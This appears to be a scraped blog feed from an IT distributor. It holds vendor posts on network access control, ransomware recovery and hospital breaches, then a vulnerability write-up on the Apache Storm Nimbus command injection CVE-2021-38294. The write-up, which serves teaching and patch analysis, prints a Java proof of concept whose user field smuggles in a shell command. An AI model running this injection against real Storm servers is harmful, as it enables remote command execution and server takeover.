Skip to content

Unleashing the Power of Protection: Why Network Access Controls are Vital for Data Security

Safeguarding Data in the Digital Jungle

In today’s fast-paced digital world, where information flows freely and cyber threats lurk around every corner, organizations must fortify their data defenses. The need to protect sensitive information has become more critical than ever before. In this age of technological marvels, implementing robust network access controls has emerged as the key to ensuring the safety of valuable data. Join us as we explore why organizations worldwide are turning to these safeguards to shield their digital assets from harm.

The Importance of Network Access Controls

The Rise of Digital Vulnerabilities

With the proliferation of cloud computing, Internet of Things (IoT) devices, and remote working practices, organizations face an expanding attack surface. Malicious actors are constantly devising innovative methods to breach network defenses and gain unauthorized access to sensitive data. This evolving landscape demands a proactive approach to security, where network access controls play a pivotal role.

network access controls portnox security

Fortifying the Perimeter

Network access controls act as sentinels, standing guard at the gates of an organization’s digital infrastructure. By defining and enforcing access policies, these controls ensure that only authorized personnel can enter the network. Whether it’s a virtual private network (VPN) for remote access or an authentication system for employees, these controls create a fortified perimeter that prevents unauthorized entry.

Granular Control, Enhanced Security

One of the significant advantages of network access controls is their ability to provide granular control over user access. Through user authentication, multi-factor authentication (MFA), and role-based access controls (RBAC), organizations can restrict access to specific resources, limit privileges, and reduce the risk of data breaches. By granting the right people the right level of access, organizations can maintain the delicate balance between security and operational efficiency.

Defense in Depth

In an era where a single breach can lead to disastrous consequences, organizations must adopt a layered defense strategy. Network access controls complement other security measures, such as firewalls, intrusion detection systems, and encryption. By adding an additional layer of protection, these controls fortify the overall security posture of an organization, making it harder for attackers to penetrate the network perimeter.

Regulatory Compliance

As data privacy regulations continue to evolve worldwide, organizations must demonstrate compliance with stringent standards. Network access controls play a vital role in meeting these requirements. By implementing robust access controls and audit trails, organizations can showcase their commitment to data protection, ensuring that they are in line with regulations such as the General Data Protection Regulation (GDPR) and the California Consumer Privacy Act (CCPA).

Safeguarding Business Continuity

The impact of a data breach can be catastrophic, leading to reputational damage, financial loss, and disrupted operations. By implementing network access controls, organizations can minimize the risk of unauthorized access and mitigate the potential fallout of a security incident. Protecting data not only safeguards an organization’s operations but also fosters trust among customers, partners, and stakeholders.

network access controls portnox llc

Preservation Requires Network Access Controls

In the digital era, where data is the lifeblood of organizations, protecting sensitive information has become paramount. Implementing network access controls serves as a robust line of defense against cyber threats, ensuring that only authorized individuals can access valuable data. By fortifying the network perimeter, providing granular control, and adhering to regulatory compliance, organizations can safeguard their digital assets and preserve their reputation. So, don’t wait—unleash the power of protection with network access controls and embark on a secure digital journey where your data is shielded from the ever-present threats of the digital jungle.

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Portnox
Portnox provides simple-to-deploy, operate and maintain network access control, security and visibility solutions. Portnox software can be deployed on-premises, as a cloud-delivered service, or in hybrid mode. It is agentless and vendor-agnostic, allowing organizations to maximize their existing network and cybersecurity investments. Hundreds of enterprises around the world rely on Portnox for network visibility, cybersecurity policy enforcement and regulatory compliance. The company has been recognized for its innovations by Info Security Products Guide, Cyber Security Excellence Awards, IoT Innovator Awards, Computing Security Awards, Best of Interop ITX and Cyber Defense Magazine. Portnox has offices in the U.S., Europe and Asia. For information visit http://www.portnox.com, and follow us on Twitter and LinkedIn.。

Ransomware Recovery for Breached Networks: A Deep Dive Into Data Recovery Across Industries

On a seemingly ordinary day in Curry County, Oregon (April 26, 2023, to be precise), a sheriff’s dispatch discovered a world gone silent and files rendered impenetrable, replaced with cold encryption that barred their way.

This was no ordinary assault; this was an ambush in the form of a meticulously executed ransomware attack. The lifeblood of the county’s daily operations—networks, servers, vital online services—had all been infected, leading to a paralysis that shocked the local community to a standstill.

A daunting reality set in for County Commissioner Brad Alcorn, “Everything’s got to start over… We are essentially starting from scratch.” The enemy behind this devastating cyber onslaught was revealed to be Royal, an infamous ransomware group known for their ruthless precision and escalating global attacks.

The Curry County incident serves as a cautionary tale about the pervasive threats posed by ransomware and the reality of ransomware recovery – ransomware data recovery isn’t always possible. It emphasizes the need for robust and adaptable cybersecurity measures in the face of rapidly evolving digital dangers.

With this in mind, let’s dive deeper into the ever-evolving ransomware landscape and the challenges companies face in recovering their critical data following a cyber attack.

Ransomware Now: A Snapshot

● The Verizon Data Breach Investigations Report 2022 highlights an alarming rise in ransomware attacks during that year, accounting for a quarter of all data breaches.
● Sophos’s report, “The State of Ransomware 2022,” reveals a troubling upward trend: a staggering 66% of organizations fell victim to ransomware in 2021, a surge of 78% from 2020.
● While all industries are at risk, some are more vulnerable than others. Industrial goods and services, technology, construction and materials, travel and leisure, healthcare, education, and government sectors are the top targets of these attacks.
● Cybereason’s survey points out the profound impacts of ransomware on the workforce. It led to layoffs in almost 40% of affected companies and prompted a 35% resignation rate at the executive level. One-third of these businesses had to pause operations temporarily.
● Small businesses are at heightened risk, according to an UpCity study, as only 50% of U.S. small businesses have established cybersecurity measures.
● Ransomware attackers mainly exploit known vulnerabilities in the systems they target.
● Phishing emails serve as the main gateway for ransomware attacks, illustrating the importance of cybersecurity awareness among employees.

These statistics aren’t meant to be alarmist but rather drive home the unquestionable and dire threat ransomware attacks pose in 2023. Because while it’s true that ransomware attacks are nothing new, they are evolving – they’re more frequent, sophisticated, and severe than in previous years.

It’s essential to understand this point. You’re more likely to fall victim to a ransomware attack today and, equally, more likely to need to navigate ransomware data recovery.

Ransomware Attacks & Recovery Across Industries

Ransomware data recovery is a gamble. It hinges on the decryption key that the hacker might provide post-payment. But there’s no guarantee. Hackers can disappear after payment, leaving data forever locked. Worse still, some malware strains irreversibly damage or delete files during the encryption process. Additionally, if backups (your route to self-recovery) are infected or nonexistent, data loss is almost inevitable.

The best way to understand the process and effects of these attacks is to look at some high-profile attacks more closely.

Government and Public Services

Oakland Attack: In late April, a ransomware attack struck Oakland, crippling the city’s email systems, phone lines, and some websites. While the attack didn’t touch emergency services, it substantially disrupted non-emergency ones. The city kept the ransom demand under wraps and refused to pay. Instead, they collaborated with law enforcement and cybersecurity professionals to investigate the attack and restore systems. The city also cautioned residents to watch for scams and phishing attempts stemming from the attack .

Dallas Attack: Dallas found itself grappling with the aftermath of a ransomware attack by the Royal ransomware gang. The attack severely disrupted systems running police, fire department, courts, and critical infrastructure operations. For two weeks, the city engaged in a massive recovery effort. Police officers reverted to handwritten notes, while firefighters entered dangerous scenarios without the usual digital dispatch information. Following criticism, the city restored some dispatch systems, albeit with notable delays. As the city’s chief information security officer Brian Gardner noted, the city would “be working at this for weeks and months to do all the clean up.”

Education

In 2020, a ransomware attack hit Baltimore County Public Schools (BCPS). The school, with 115,000 students, described it as a “catastrophic attack on our technology system.” The cause? An error by a contractor, says a report by Maryland’s Office of the Inspector General for Education.

The attack closed the school for two days in November and costs exceeded $9.6 million. The report suggests the school’s IT division failed to protect sensitive data and ignored audit recommendations. Critically, a phishing email went unnoticed for 15 days. A staffer received it and contacted tech support, who unknowingly released malware into the network. The antivirus couldn’t detect this malware and it stealthily disabled network functions, facilitating the attack.

Regarding ransomware data recovery, the FBI recommended that BCPS refrain from sharing information about the attack during and after the investigation as a security measure. However, the Office of the Inspector General for Education’s report commended the school for its prompt and comprehensive recovery actions. The measures implemented have been lauded as a leading example of cyber defense across the nation.

We do know that BCPS transitioned its database servers to an encrypted cloud environment, departing from their previous on-premise setup. This shift was a critical step in safeguarding against future cyber threats. The school also addressed earlier technology infrastructure needs identified in the Superintendent’s proposed operating budget. While initial requests for these improvements weren’t funded, the school’s response to the cyberattack ultimately accelerated its technology infrastructure upgrades.

Healthcare

The healthcare industry is a prime target for ransomware attacks due to the sensitive and highly lucrative data they store. Here are some recent healthcare ransomware attacks.

Morris Hospital: Morris Hospital & Healthcare Centers in Illinois faced a significant cyberattack on May 22, 2023. The Royal ransomware group, the same group behind the Curry Country attack, claimed responsibility. As part of ransomware recovery efforts, Morris brought in experts to investigate and check patient data exposure. They found that their primary medical record system was safe, but a network storing patient data was compromised. Luckily, already pre-installed security measures helped lessen the attack’s damage. The hospital promised to keep patients and the public updated.

Norton Healthcare: On May 9, 2023, Norton Healthcare in Kentucky suffered a cybersecurity hit. They regained control of their network but shifted to manual data recording to maintain patient care during the ransomware data recovery period. The attack led to delays in services like medical imaging and lab test results and also caused a backlog in patient portal messages.

Tennessee Orthopedic Clinics: Tennessee Orthopedic Clinics experienced a security breach between March 20 and March 24, 2023. The intrusion threatened patient information, including names, contact details, and health records. The clinic engaged experts for a thorough investigation and has since implemented more robust security measures to prevent future breaches. The number of affected patients remains unclear, but the clinic has informed the HHS’ Office for Civil Rights about the incident.

Industrial and Manufacturing

In 2020, Advantech, a prominent IoT manufacturer based in Taiwan, fell victim to a significant ransomware attack. The first indication of the breach came when the company received a ransom demand for a staggering 750 bitcoins, roughly equivalent to $14 million at the time.

The attackers offered a chilling proposition: pay up, and they would delete all stolen data and restore the encrypted systems. To further intimidate Advantech, the criminals published over 3GB of data on their leak site, claiming that this was a mere two percent of the total data they had exfiltrated.

Despite the apparent pressure, Advantech remained tight-lipped about whether the ransom was ultimately paid. Instead, the company emphasized its efforts toward recovery and reassured stakeholders that operations were gradually returning to normal. The company rolled out a variety of new detection and protection strategies, along with response actions to curtail the risks of similar attacks in the future .

This attack is highly significant because according to a Dragos report, ransomware attacks on industrial firms rose 87% in 2022 .

How Does Ransomware Removal Work?

Okay, let’s say ransomware locks up your systems. What next?

Ransomware removal is an intricate process that requires a comprehensive, step-by-step approach. When carried out correctly, it can mitigate the damage inflicted and ensure the safety of your system in the future.

Step 1: Disconnect the affected computer from the network or internet. This is paramount as it prevents further propagation of the ransomware and limits any potential damage to other systems within the network. The disconnection isolates the ransomware, containing it within the infected device.

Step 2: Identifying the specific type and variant of the ransomware. This is a critical part of the process, as different types of ransomware require other removal methods. Understanding the specific ransomware variant helps to determine the most effective approach for removal and can guide the selection of appropriate anti-malware tools or procedures.

Step 3: Utilize anti-malware or antivirus software to scrutinize the infected computer and eliminate the ransomware. It’s important to note that the efficacy of these software tools may vary based on the sophistication of the ransomware. Some advanced forms of ransomware may resist automated removal, necessitating manual intervention for their complete eradication.

Step 4: If backups of your files are available, you should use them to restore encrypted files. It’s essential, however, to ensure that the backup itself is clean and not infected with the ransomware before proceeding. A compromised backup can reintroduce the ransomware, undoing all previous removal efforts.

Step 5: In situations where a backup is not accessible or if the encrypted files cannot be restored, you may have to consider using a decryption tool, provided one is available. Note that decryption tools are ransomware-specific and may not exist for all variants. Their success rate also varies, and they might not always be able to decrypt your files.

Step 6: After successful ransomware removal and file restoration, ensure that your operating system, software applications, and security software are fully updated. Installing the latest patches and updates enhances your system’s resistance against potential future attacks. Regular updating is an integral part of maintaining a robust defense against ransomware and other forms of malware.

Strategies for Improving Chances of Data Recovery Following a Ransomware Attack

Of course, the best strategy is to not fall victim to a ransomware attack to begin with. Of course, this isn’t always possible. However, there are steps you can take that either reduce the likelihood of falling victim or increase your chances of ransomware data recovery following an attack:

  • Maintain Regular Backups: Regularly back up all critical data and ensure the backups are stored offsite or on a separate network, inaccessible to the infected systems.
  • Implement a Disaster Recovery Plan (DRP): Develop a comprehensive disaster recovery plan which outlines all steps to take in the event of a ransomware attack, including restoring backups and securing compromised systems.
  • Encrypt Sensitive Data: Encryption of sensitive data can help to protect it even if attackers gain access to the network.
  • Train Employees: Regularly conduct cybersecurity training to reduce the risk of phishing attacks, a common vector for ransomware.
  • Update and Patch Systems: Keep all systems updated with the latest patches to minimize vulnerabilities that ransomware might exploit.
  • Monitor Network Activity: Implement network monitoring to detect unusual activity that might signal a ransomware infection.
  • Use Robust Antivirus Software: Install and maintain a reliable antivirus program to help identify and remove potential threats.
  • Implement Multi-factor Authentication (MFA): MFA can help secure systems and make unauthorized access more difficult.

It’s primarily advised to seek professional advice for proper setup and maintenance of security measures, and include them in any recovery process. As always, in the event of a ransomware attack it’s critical to immediately inform local law enforcement and report to appropriate cybercrime units.

Remember, prevention is always better than recovery when it comes to ransomware attacks. Regular reviews of cybersecurity measures and updates to the disaster recovery plan can help to improve response time and effectiveness if an attack does occur.

Final Thoughts

Ransomware attacks pose a grave and escalating threat across various industries, causing extensive damage to data and networks. With this in mind, robust, systematic recovery efforts are not just beneficial but crucial. Proper understanding and implementation of these efforts can significantly mitigate the destructive impact and help maintain the integrity of critical data and systems.

 

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Portnox
Portnox provides simple-to-deploy, operate and maintain network access control, security and visibility solutions. Portnox software can be deployed on-premises, as a cloud-delivered service, or in hybrid mode. It is agentless and vendor-agnostic, allowing organizations to maximize their existing network and cybersecurity investments. Hundreds of enterprises around the world rely on Portnox for network visibility, cybersecurity policy enforcement and regulatory compliance. The company has been recognized for its innovations by Info Security Products Guide, Cyber Security Excellence Awards, IoT Innovator Awards, Computing Security Awards, Best of Interop ITX and Cyber Defense Magazine. Portnox has offices in the U.S., Europe and Asia. For information visit http://www.portnox.com, and follow us on Twitter and LinkedIn.。

Examining the Tallahassee Memorial Hospital Cyber Attack

In late January 2023, Tallahassee Memorial Healthcare (TMH), a non-profit health system serving patients in North Florida and South Georgia, experienced a cyber attack that forced it to operate under emergency downtime procedures for around two weeks. The cyber attack was first detected on February 3, when TMH’s IT team noticed unusual system activity. The hospital’s systems were immediately secured, and a third-party cybersecurity firm was engaged to investigate the breach. 

The investigation determined that unauthorized individuals had access to TMH’s systems between January 26 and February 2, and exfiltrated files during that time. The files that were stolen included names, Social Security numbers, medical record and patient account numbers, addresses, dates of birth, health insurance information, dates of service, treatment plans, diagnoses, visit notes, prescription information, and physician names.

As a result of the Tallahassee Memorial Hospital cyber attack, affected patients were notified of the breach on March 31, and offered them free credit monitoring and identity theft protection services. The hospital also said that it did not believe that the cyber attack had any impact on patient care.

Could NAC Have Stopped the Tallahassee Memorial Hospital Attack?

Network access control (NAC) could have helped to stop the Tallahassee Memorial Hospital cyber attack. NAC is a security technology that controls who and what devices can access a network. It can be used to block unauthorized devices from accessing the network, and to enforce security policies for authorized devices.

In the case of the Tallahassee Memorial Hospital cyber attack, NAC could have helped to prevent the hackers from gaining access to the network in the first place. If the hackers’ devices had been blocked from accessing the network, they would not have been able to exploit the vulnerabilities that were used to launch the attack.

In addition to preventing unauthorized access, NAC can also be used to detect and respond to security incidents. For example, if a NAC system detects that an unauthorized device has gained access to the network, it can be configured to quarantine the device and notify security personnel.

Overall, NAC is a valuable security tool that can help to protect organizations from cyber attacks. In the case of the Tallahassee Memorial Hospital cyber attack, NAC could have helped to prevent the attack from happening in the first place, or to detect and respond to the attack more quickly.

Here are some specific ways that NAC could have helped TMH:

  • Block unauthorized devices from accessing the network.
  • Enforce security policies for authorized devices.
  • Detect and respond to security incidents.
  • Improve visibility into network traffic.
  • Provide reporting and auditing capabilities.

By taking these steps, NAC could have helped TMH to improve its cybersecurity posture and make it more difficult for hackers to successfully attack the organization.

A Good Reminder: It’s Important to Have a Prevention Plan

The Tallahassee Memorial Hospital cyber attack is a reminder of the importance of cybersecurity for healthcare organizations. Healthcare data is a valuable target for hackers, and organizations need to take steps to protect it. This includes implementing strong security measures, such as firewalls, intrusion detection systems, and data encryption. Organizations should also train their employees on cybersecurity best practices, such as how to spot phishing emails and how to create strong passwords.

The cyber attack on TMH is also a reminder of the importance of having a plan in place in case of a cyber attack. This plan should include steps for how to secure the organization’s systems, how to notify affected individuals, and how to recover from the attack. Organizations should regularly test their plans to make sure that they are effective.

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Portnox
Portnox provides simple-to-deploy, operate and maintain network access control, security and visibility solutions. Portnox software can be deployed on-premises, as a cloud-delivered service, or in hybrid mode. It is agentless and vendor-agnostic, allowing organizations to maximize their existing network and cybersecurity investments. Hundreds of enterprises around the world rely on Portnox for network visibility, cybersecurity policy enforcement and regulatory compliance. The company has been recognized for its innovations by Info Security Products Guide, Cyber Security Excellence Awards, IoT Innovator Awards, Computing Security Awards, Best of Interop ITX and Cyber Defense Magazine. Portnox has offices in the U.S., Europe and Asia. For information visit http://www.portnox.com, and follow us on Twitter and LinkedIn.。

New Case Studies: Client Success Stories with SafeDNS

We’re thrilled to share some exciting new case studies from our valued clients at SafeDNS! Our latest success stories come from Fox Techno Service, Hack-Inn, and Deteinco SLU. These companies have experienced firsthand the benefits of implementing SafeDNS solutions to safeguard their online activities. Here’s what they had to say: Wilco Ettema from Fox Techno Service emphasized, “The world wide web has many dangers. A large part, if not all, is captured by a properly configured SafeDNS solution. It gives the client and the MSP an extra layer of security.” Hack-Inn, another satisfied client, expressed their satisfaction with the collaboration, stating, “The cooperation with SafeDNS is fine. Fast response times. I would advise others to consider hiring the solution as it is a very good option.” Simó Albareda from Deteinco SLU shared their positive experience, saying, “Highly efficient hardware-independent solution, reasonable price, ease of deployment and management, and great support. We are very happy with the SafeDNS solution.” We encourage you to read the full case studies on our website, where you’ll find more details about how SafeDNS has helped these clients enhance their online security. We constantly update our case studies section to showcase the diverse range of organizations benefiting from SafeDNS solutions. At SafeDNS, we remain committed to providing top-notch protection against online threats. With our advanced technology, proactive approach, and dedicated support, we aim to ensure a secure and productive online environment for businesses of all sizes. Stay tuned for more exciting updates and success stories from our clients!

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About SafeDNS
SafeDNS breathes to make the internet safer for people all over the world with solutions ranging from AI & ML-powered web filtering, cybersecurity to threat intelligence. Moreover, we strive to create the next generation of safer and more affordable web filtering products. Endlessly working to improve our users’ online protection, SafeDNS has also launched an innovative system powered by continuous machine learning and user behavior analytics to detect botnets and malicious websites.

CVE-2021-38294: Apache Storm Nimbus Command Injection

Introduction

#CVE-2021-38294 is a Command Injection vulnerability that affects Nimbus server in apache storm in getTopologyHistory services, A successful crafted request to Nimbus server will result in exploitation for this vulnerability will lead to execute malicious command & takeover the server. The affected versions are 1.x prior to 1.2.4 & 2.x prior to 2.2.1.

What is Apache Storm ?

Apache Storm is a distributed system for processing big data in real-time, Specifically designed to handle large volumes of data in a reliable and scalable manner and It operates as a streaming data framework allowing for high ingestion rates and efficient data processing. While it is stateless, Storm effectively manages distributed environments and cluster states through Apache ZooKeeper. It provides a straightforward approach to performing parallel manipulations on real-time data, enabling a wide range of data processing tasks. Apache Storm is extensively used by a lot of enterprises/organizations such as Twitter for processing tweets and clicks in its Publisher Analytics Products suite, benefiting from deep integration with the Twitter infrastructure. In Apache Storm spouts and bolts are connected to form a topology, which represents the real-time application logic as a directed graph. Spouts emit data that is processed by bolts, and the output of a bolt can be passed to another bolt. storm keeps the topology running until explicitly stopped. The execution of spouts and bolts in storm is referred to as tasks. Each spout and bolt can have multiple instances running in separate threads. These tasks are distributed across multiple worker nodes, and the worker nodes listen for jobs and manage the execution of tasks. Finally, What we will need to know well are Nimbus known as master node which plays a central role in the storm framework as it is responsible for running the storm topology by analyzes the topology and collects the tasks to be executed, distributing them to an available Supervisor node and Supervisor is the worker node which can have multiple worker processes, It’s job is to delegate the tasks to these worker processes & each worker process can spawn multiple executors based on the required workload and executes the assigned tasks and communication between the Nimbus and Supervisors is facilitated through an internal distributed messaging system ensuring efficient coordination and data exchange within the storm cluster.

Testing Lab

Let’s start to build our testing lab. First, We would need ZooKeeper to be installed you can download it from here. After downloading, extract it and create a directory data within Zookeeper directory: 
mkdir data
Next, Copy the sample configuration as a main configuration file for Zookeeper: 
cp conf/zoo_sample.cfg conf/zoo.cfg
Open zoo.cfg file and add the data directory file path we created previously: Now, Start ZooKeeper: 
./bin/zkServer.sh start
The server started and verify it by running the CLI: 
./bin/zkCli.sh
Now, It’s time to install & start Apache Storm, Download it from here. First, Create another folder inside of apache storm directory by the name data: 
mkdir data
After that open the configurations file conf/storm.yaml and add the following to the file: 
# Storm configuration file

# Nimbus settings
nimbus.seeds: ["localhost"]  # List of Nimbus hostnames or IP addresses
nimbus.host: "localhost"
# ZooKeeper settings
storm.zookeeper.servers:
  - "localhost"

# Storm UI settings
ui.port: 8081  

# Supervisor settings
supervisor.slots.ports:
  - 6700
  - 6701
  - 6702

# Worker settings
worker.childopts: "-Xmx768m"

# Topology settings
topology.debug: true  # Enable debugging for topologies
topology.max.spout.pending: 1000  # Maximum number of pending messages per spout

# Log4j settings
worker.log.level: INFO  # Log level for Storm workers
Don’t forget to replace the Zookeper & Nimbus server IP with your IP (The same machine IP). Let’s start it now. Starting Nimbus server: 
./bin/storm nimbus
Starting Supervisor: 
./bin/storm supervisor
Starting Storm UI: 
./bin/storm ui
Visit the UI on port 8081 as we configure:

Patch Diffing

You can download the source code from here, The patch here on github. It shows us changes made to storm-client/src/jvm/org/apache/storm/utils/ShellUtils.java where the getGroupsCommand() method got deleted which was return a command as a string array to retrieve the groups on the system. Then, the following function modified: 
##### Before
public static String[] getGroupsForUserCommand(final String user) {
        if (WINDOWS) {
            throw new UnsupportedOperationException("Getting user groups is not supported on Windows");
        }
        //'groups username' command return is non-consistent across different unixes
        return new String[]{
            "bash", "-c", "id -gn " + user
                          + "&& id -Gn " + user
        };
    }
    
##### After
public static String[] getGroupsForUserCommand(final String user) {
        if (WINDOWS) {
            throw new UnsupportedOperationException("Getting user groups is not supported on Windows");
        }
        //'groups username' command return is non-consistent across different unixes
        return new String[]{"id", "-Gn", user};
    }
The modification of getGroupsForUserCommand(String user) has been updated to use a more concise command. We can see clearly from the patch diffing that the Command Injection Occures in this part specifically in user parameter that get passed to the getGroupsForUserCommand() and also we can notice the bach -c in the String array, Let’s move to the analysis to understand how this happens.

The Analysis

When we go to the apache-storm-2.2.0/storm-client/src/jvm/org/apache/storm/utils/ShellUtils.java and scroll down after getGroupsForUserCommand() method we can see the following: This run() method is declared as protected which means it can only be accessed within the same package or by sub-classes and it implements a control flow that determines whether a specified interval has passed since the last execution, If the interval has passed it will reset the exitCode and proceeds to execute the runCommand() method. Now, By scrolling down: We will be able to see the runCommand() method and It’s a long method, So let’s break it down and explain it: 
ProcessBuilder builder = new ProcessBuilder(getExecString());
Timer timeOutTimer = null;
ShellTimeoutTimerTask timeoutTimerTask = null;
timedOut = new AtomicBoolean(false);
completed = new AtomicBoolean(false);
First, It creates a new ProcessBuilder object with the executable command obtained from the getExecString() method: Here is the getExecString() method which returns the command value. Then, it declares two variables of type Timer and ShellTimeoutTimerTask as null which will be used to handle timeouts for the command execution. Finally, Creates two AtomicBoolean variables named timedOut and completed & initializes them with the value false which used to track the status of the command execution. 
if (environment != null) {
    builder.environment().putAll(this.environment);
}
if (dir != null) {
    builder.directory(this.dir);
}

builder.redirectErrorStream(redirectErrorStream);
process = builder.start();
The first if condition checks if the environment variable is not null and If it’s not null, it retrieves the environment variables associated with the ProcessBuilder instance using builder.environment() and adds all the key value pairs from the this.environment map. The second if condition checks if the dir variable is not null and If it’s not null, it sets the working directory of the process to the specified directory t his.dir using builder.directory(this.dir). Finally, it’s configuring the ProcessBuilder to redirect the error stream of the process to the same output stream If redirectErrorStream is set to true the error stream will be merged with the standard output stream and then starts the process using the configured ProcessBuilder by calling the start() method. 
if (timeOutInterval > 0) {
    timeOutTimer = new Timer("Shell command timeout");
    timeoutTimerTask = new ShellTimeoutTimerTask(this);
    //One time scheduling.
    timeOutTimer.schedule(timeoutTimerTask, timeOutInterval);
}
final BufferedReader errReader =
    new BufferedReader(new InputStreamReader(process
                                                 .getErrorStream()));
BufferedReader inReader =
    new BufferedReader(new InputStreamReader(process
                                                 .getInputStream()));
final StringBuffer errMsg = new StringBuffer();

// read error and input streams as this would free up the buffers
// free the error stream buffer
Thread errThread = new Thread() {
Moving to here this IF condition checks if the timeOutInterval is greater than 0, then set up a timer Shell command timeout task to handle the timeout and schedule the timeoutTimerTask to run after the specified timeOutInterval in milliseconds. After that create 2 BufferedReader objects which are errReader and inReader to read the error and input streams of the process, respectively. The process.getErrorStream() and process.getInputStream() methods return the streams associated with the running process. Next, a StringBuffer object named errMsg to store the error message, a new Thread object named errThread then create an anonymous subclass of Thread with overridden run() method. 
@Override
public void run() {
    try {
        String line = errReader.readLine();
        while ((line != null) && !isInterrupted()) {
            errMsg.append(line);
            errMsg.append(System.getProperty("line.separator"));
            line = errReader.readLine();
        }
    } catch (IOException ioe) {
        LOG.warn("Error reading the error stream", ioe);
    }
}
};
try {
errThread.start();
} catch (IllegalStateException ise) {
//ignore
}
try {
parseExecResult(inReader); // parse the output
// clear the input stream buffer
String line = inReader.readLine();
while (line != null) {
    line = inReader.readLine();
}
// wait for the process to finish and check the exit code
exitCode = process.waitFor();
// make sure that the error thread exits
joinThread(errThread);
completed.set(true);
//the timeout thread handling
//taken care in finally block
if (exitCode != 0) {
    throw new ExitCodeException(exitCode, errMsg.toString());
}
} catch (InterruptedException ie) {
throw new IOException(ie.toString());
} finally {
if (timeOutTimer != null) {
    timeOutTimer.cancel();
}
// close the input stream
try {
    // JDK 7 tries to automatically drain the input streams for us
    // when the process exits, but since close is not synchronized,
    // it creates a race if we close the stream first and the same
    // fd is recycled.  the stream draining thread will attempt to
    // drain that fd!!  it may block, OOM, or cause bizarre behavior
    // see: https://bugs.openjdk.java.net/browse/JDK-8024521
    //      issue is fixed in build 7u60
    InputStream stdout = process.getInputStream();
    synchronized (stdout) {
        inReader.close();
    }
} catch (IOException ioe) {
    LOG.warn("Error while closing the input stream", ioe);
}
if (!completed.get()) {
    errThread.interrupt();
    joinThread(errThread);
}
try {
    InputStream stderr = process.getErrorStream();
    synchronized (stderr) {
        errReader.close();
    }
} catch (IOException ioe) {
    LOG.warn("Error while closing the error stream", ioe);
}
process.destroy();
lastTime = System.currentTimeMillis();
}
Finally, In a summary defines a thread that reads the error stream and appends its contents to the errMsg StringBuffer and start the thread & then proceeds to parse the output from the input stream using the parseExecResult method. After that, the input stream clear its buffer. Then, wait for the process to finish and retrieves the exit code. Next, It ensure that the error thread has exited by joining it and If the exit code is not zero, it throws an ExitCodeException with the error message. In the finally block, it cancel the timeout timer if it exists, closes the input stream, interrupts the error thread if the command execution is not completed, closes the error stream, destroys the process, and updates the lastTime variable with the current time. So, Now how actually the code can get injected or where is the point that the user give the malicious input ?. Let’s discover it by going through the PoC: 
import org.apache.storm.utils.NimbusClient;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;

public class ThriftClient {
    public static void main(String[] args) throws Exception {
        HashMap config = new HashMap();
        List<String> seeds = new ArrayList<String>();
        seeds.add("localhost");
        config.put("storm.thrift.transport", "org.apache.storm.security.auth.SimpleTransportPlugin");
        config.put("storm.thrift.socket.timeout.ms", 60000);
        config.put("nimbus.seeds", seeds);
        config.put("storm.nimbus.retry.times", 5);
        config.put("storm.nimbus.retry.interval.millis", 2000);
        config.put("storm.nimbus.retry.intervalceiling.millis", 60000);
        config.put("nimbus.thrift.port", 6627);
        config.put("nimbus.thrift.max_buffer_size", 1048576);
        config.put("nimbus.thrift.threads", 64);
        NimbusClient nimbusClient = new NimbusClient(config, "localhost", 6627);

        // send attack
        nimbusClient.getClient().getTopologyHistory("foo;touch /tmp/pwned;id ");
    }
}
When we take a look here at the PoC we can notice that it’s connecting to Storm cluster by adding the configuration first. Then connect to the cluster at localhost on port 6627 & passing the previous configurations. the call the getTopologyHistory() function from the Storm Client. And here where is the command Injection happens. Let’s take a look at the implementation of Nimbus and the function: When we go under apache-storm-2.2.0/storm-server/src/main/java/org/apache/storm/nimbus/NimbusHeartbeatsPressureTest.java which is responsible for implementation of a Nimbus heartbeats pressure test. It starts with defining the class and other variables for configurations. After that as we can see it starts to initializing the Config for the heartbeats pressure test. Then by scrolling more down: We can see clearly in the HeartbeatSendTask that it’s using the defined NimbusClient that named client to create a new client connection & Passed the previous initialized Config with Nimbus Host & Port. Finally, Here we can see it started to connect to the configured client and call the sendSupervisorWorkerHeartbeats() method which can be called remotely. Now, if we go to the apache-storm-2.2.0/storm-server/src/main/java/org/apache/storm/daemon/nimbus/Nimbus.java Class: Here we can see the method clearly accessible remotely and also if we search for getTopologyHistory() method: Here we can see the method clearly and it takes the user as an parameter to retrieve the topology history information for a the user. And here where the command get injected, When we back to the first of the analysis at the patch diffing when we return information about user, As the user here can be passed and manupilated by anyone through getTopologyHistory() method. It will result in malicious command Injection.

Exploitation

Here we have 2 ways to exploit CVE-2021-38294 an exploit within Metasploit with metasploit as it’s easy to use and most of us fimalier with it By using the following module: and the 2nd one is a PoC within github.

Conclusion

Finally, This bug only works on linux as the injectable of the affected component is when getting the information about the user on linux. We saw how this vulnerability happens and the root-cause of the vulnerability & How it can be exploited remotely.

Resources

